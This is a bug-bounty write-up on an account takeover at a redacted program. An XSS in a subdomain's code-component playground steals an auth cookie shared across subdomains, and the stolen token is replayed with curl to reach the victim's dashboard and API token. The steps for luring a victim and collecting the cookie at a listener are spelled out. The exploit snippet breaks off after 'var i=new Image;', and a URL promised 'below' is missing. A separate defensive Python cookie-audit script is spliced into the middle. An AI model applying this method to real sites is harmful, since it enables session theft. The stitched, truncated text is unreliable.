Hi, I’m Bijan (0xBijan). Today I’m going to share one of my findings on ATO (account takeover) bugs.

A few months back I was hunting on a private program; let’s call it redacted.com to respect the program’s policy and privacy. Everything under *.redacted.com was in scope.

dashboard.redacted.com was the program’s main surface, where users can create an account, upload files and more. When I logged into my account at dashboard.redacted.com, my auth token was stored in the unifiedDashboardAuth cookie set by the Set-Cookie header.

For an authenticated user the auth token is everything: anyone who holds your authorization token has full access to your account.

Whenever you log in to dashboard.redacted.com, that cookie (carrying the authorization token) is shared across all subdomains. This means that if you find an XSS on any subdomain, you can steal the cookie easily (no strict CSP was implemented).
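The security-relevant point here is cookie scope. A Set-Cookie header with a Domain attribute makes the browser attach that cookie to the named domain and every subdomain of it, and without HttpOnly the cookie is readable from page script, so an XSS on any subdomain can read it. The following is an added example, not code from the original post or the program: a small audit of Set-Cookie headers that flags exactly that combination, next to the hardened header a defender would want. The cookie name follows the post; the header values, the hostname redacted.com and the function names are constructed for the example.

```python
# Added example (not from the original post): audit Set-Cookie headers for an
# auth cookie that is scoped to every subdomain and readable from script.
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Constructed sample headers; the cookie name follows the post, the token
# values and attributes are made up for this example.
SAMPLE_HEADERS = [
    "unifiedDashboardAuth=tok_constructed_1; Domain=.redacted.com; Path=/; Secure",
    "unifiedDashboardAuth=tok_constructed_2; Path=/; Secure; HttpOnly; SameSite=Lax",
    "theme=dark; Domain=redacted.com; Path=/",
]


@dataclass
class CookieAudit:
    name: str
    domain: Optional[str]            # Domain attribute (leading dot stripped), None if absent
    shared_across_subdomains: bool   # True when a Domain attribute is present
    script_readable: bool            # True when HttpOnly is missing
    secure: bool
    samesite: Optional[str]
    findings: List[str] = field(default_factory=list)


def parse_set_cookie(header: str) -> Tuple[str, str, Dict[str, Optional[str]]]:
    """Split a Set-Cookie value into (name, value, {attribute_lowercase: value_or_None})."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs: Dict[str, Optional[str]] = {}
    for part in parts[1:]:
        if not part:
            continue
        key, sep, val = part.partition("=")
        # Flag attributes such as Secure and HttpOnly carry no value.
        attrs[key.strip().lower()] = val.strip() if sep else None
    return name.strip(), value, attrs


def audit_set_cookie(header: str) -> CookieAudit:
    """Classify one Set-Cookie header by scope and script visibility."""
    name, _value, attrs = parse_set_cookie(header)
    domain = attrs.get("domain")
    if domain:
        # RFC 6265: a leading dot in the Domain attribute is ignored by browsers.
        domain = domain.lstrip(".").lower()
    audit = CookieAudit(
        name=name,
        domain=domain,
        # With a Domain attribute the cookie is sent to that host and all of its
        # subdomains; without one the cookie is host-only.
        shared_across_subdomains=domain is not None,
        script_readable="httponly" not in attrs,
        secure="secure" in attrs,
        samesite=attrs.get("samesite"),
    )
    if audit.shared_across_subdomains:
        audit.findings.append(f"sent to all subdomains of {domain}: an XSS on any of them receives it")
    if audit.script_readable:
        audit.findings.append("missing HttpOnly: readable via document.cookie")
    if not audit.secure:
        audit.findings.append("missing Secure: also sent over plain HTTP")
    if audit.samesite is None:
        audit.findings.append("missing SameSite: attached to cross-site requests")
    return audit


def risk_level(audit: CookieAudit) -> str:
    """Wide scope plus script readability is the combination the write-up relied on."""
    if audit.shared_across_subdomains and audit.script_readable:
        return "high"
    if audit.shared_across_subdomains or audit.script_readable:
        return "medium"
    return "low"


def hardened_set_cookie(name: str, value: str) -> str:
    """The corrected header: host-only (no Domain), HttpOnly, Secure, SameSite=Lax."""
    return f"{name}={value}; Path=/; Secure; HttpOnly; SameSite=Lax"


if __name__ == "__main__":
    for header in SAMPLE_HEADERS:
        result = audit_set_cookie(header)
        print(f"{result.name}: {risk_level(result)} {result.findings}")
    print(hardened_set_cookie("unifiedDashboardAuth", "tok_constructed_1"))
```

Run it against the Set-Cookie headers a login response actually returns; a session or auth cookie that scores "high" is one that any subdomain XSS can read, and the fix on the server side is the host-only, HttpOnly form that hardened_set_cookie produces.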

After that I found a subdomain hosting a kind of component playground, where you can create a code component and run it. I noticed that whenever you edit or create a code component, the URL in the address bar changes.

You can see that difference in the URL below. It was also possible to inject JavaScript code, although many useful functions were filtered or blocked.

If you copy the URL after creating a malicious code component and share it with others, you can steal their cookies easily. That is what I did.

I created a code component and copied the URL:

export default () => {
  return <script>
var i=new Image;

Now send that URL to a victim who is logged into their dashboard account and wait for the listener to receive data. Once you receive the cookie, you will see that the unifiedDashboardAuth parameter holds the dashboard user’s account token.

Now add that token to the Authorization header (or replace your own token with it) and make any request: you can access the victim’s dashboard account. I made a curl request with the stolen auth token to grab the victim’s API token, and it worked.

Remember: whenever you notice that cookies are shared across subdomains, look for XSS on the subdomains if the main domain has none.


Sept 9th, 2021 – Submitted report.

Sept 17th, 2021 – Provided more info.

Sept 24th, 2021 – Triaged and severity set to High (8.6).

Oct 6th, 2021 – Bounty rewarded.